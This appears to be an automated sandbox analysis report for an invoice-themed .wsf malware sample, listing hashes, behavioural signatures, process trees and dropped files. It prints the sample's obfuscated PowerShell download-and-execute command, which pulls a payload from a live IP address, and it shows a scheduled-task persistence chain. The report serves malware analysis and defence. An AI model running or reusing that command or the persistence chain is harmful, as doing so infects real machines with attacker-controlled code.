Analysis
- max time kernel: 128s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20231020-en
- resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
- submitted: 15/11/2023, 17:36
- Static task: static1
- Behavioral task: behavioral1
- Sample: Invoice#57348024.wsf
- Resource: win7-20231020-en
General
- Target: Invoice#57348024.wsf
- Size: 113KB
- MD5: fa5cbc00cbaa12bb4b45fca8d5075587
- SHA1: 5d4c9493654c9abd21354bb9f3424726ade1b8f3
- SHA256: c57ecd0aeea0978f281e66541e3645290619eb8bc36882a2155c3cd61fee91af
- SHA512: 0b1f0107e347b37f92de84dd8f277dda4cba2bec70f6342801b8c51c4efa216a16be68aeeac42f95b7d90c44e548a541c68488ce1242b6d04b777439c7bff219
- SSDEEP: 768:H88888888888g88888888888Z88888888888V88888888888h88888888888g88t:u
Malware Config
Signatures
- Blocklisted process makes network request (2 IoCs)
  flow | pid  | Process
  3    | 1740 | WScript.exe
  5    | 2372 | powershell.exe
- Drops file in System32 directory (1 IoC)
  description                  | ioc                                                                                                                                | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid  | Process
  2372 | powershell.exe
  1044 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description             | pid  | Process
  Token: SeDebugPrivilege | 2372 | powershell.exe
  Token: SeDebugPrivilege | 1044 | powershell.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  description                      | pid  | Process     | procid_target
  PID 1740 wrote to memory of 2372 | 1740 | WScript.exe | 28
  PID 1740 wrote to memory of 2372 | 1740 | WScript.exe | 28
  PID 1740 wrote to memory of 2372 | 1740 | WScript.exe | 28
  PID 2128 wrote to memory of 2884 | 2128 | taskeng.exe | 34
  PID 2128 wrote to memory of 2884 | 2128 | taskeng.exe | 34
  PID 2128 wrote to memory of 2884 | 2128 | taskeng.exe | 34
  PID 2884 wrote to memory of 3064 | 2884 | WScript.exe | 35
  PID 2884 wrote to memory of 3064 | 2884 | WScript.exe | 35
  PID 2884 wrote to memory of 3064 | 2884 | WScript.exe | 35
  PID 3064 wrote to memory of 1044 | 3064 | cmd.exe     | 37
  PID 3064 wrote to memory of 1044 | 3064 | cmd.exe     | 37
  PID 3064 wrote to memory of 1044 | 3064 | cmd.exe     | 37
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\System32\WScript.exe (PID 1740)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#57348024.wsf"
  Signatures: Blocklisted process makes network request; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2372)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\taskeng.exe (PID 2128)
  Command line: taskeng.exe {621E7F4B-3D81-4514-BE1E-95609E1AD55A} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe (PID 2884)
    Command line: C:\Windows\System32\WScript.exe "C:\Users\Public\libraries.vbs"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (PID 3064)
      Command line: cmd /c ""C:\Users\Public\libraries.bat" "
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1044)
        Command line: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\libraries.ps1'"
        Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0SEUEWKVE1EWJUV6V9MK.temp
  Filesize: 7KB
  MD5: b7d4b468b2ca222fb1effc4c9af39d4d
  SHA1: 48cc3f0f3d1d3f17291cddaa0ae9946bef7b07bc
  SHA256: ff58f3831330d8b034b04c539c4482c25d0364a64883c07e5c669facb9811434
  SHA512: 328d15cb8edac3fbf01bbeb7734fa53c38e1317c57e1f501ffe533e719a42767e39d383c48a68f98bb3667f95e5d8159ec37402d4144d6ffa8b48a9ab06cfc2a
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: ae53949ecef5bb08672d3fc437236623
  SHA1: 3bd18aa9c9f02a1a6be0c5ead2dbafb3cf5dcc00
  SHA256: fe1285eeb97678918274be551bcf5ce715d1178e96efaf624c9c87f11c957201
  SHA512: 743fc454bfca48e6582d1aafc0ba2209ddb4e3c5d50570068a84437eb74ed40324536fdb1b54b30bcfe4fb8d53212117e6afe1221ce0a6f6cb3f27c4a6da6915
- (file path not given in the report)
  Filesize: 210B
  MD5: 440e905a6fcf6bcc0ffe763896e21044
  SHA1: 89bf89ca871095dd7431147a4e0c993bfdba897e
  SHA256: aae3e34c1f6bf5eaf7c91afec528d24ac1b10272705be506653b29df17d6e834
  SHA512: f324dbff528e9579f81af84c09ab45ef87cd8e516cb22a5f99e432d4d1ca528f3e5d8f7a1f479076a89c18cd44bbaa10df4f6a1fcdc3fe8937febadb892d89fd
- (file path not given in the report)
  Filesize: 691B
  MD5: 882c260115cfacc236251d065cc23c4c
  SHA1: cee58dd936e493370224db57ca49c4d6c0cbfeff
  SHA256: 1d1595fdd363891dd2d9d081059b2dcbca1edc72c80b6c637436a9090ba2564a
  SHA512: d1279bcc0150ba96164445a98fdb5ff5ef6cde81460af71612ee0f0a7ac8155f9d3a73aa26ccb53a9da6493e078aef42e20ca26011f0f5aa855f5ced61236641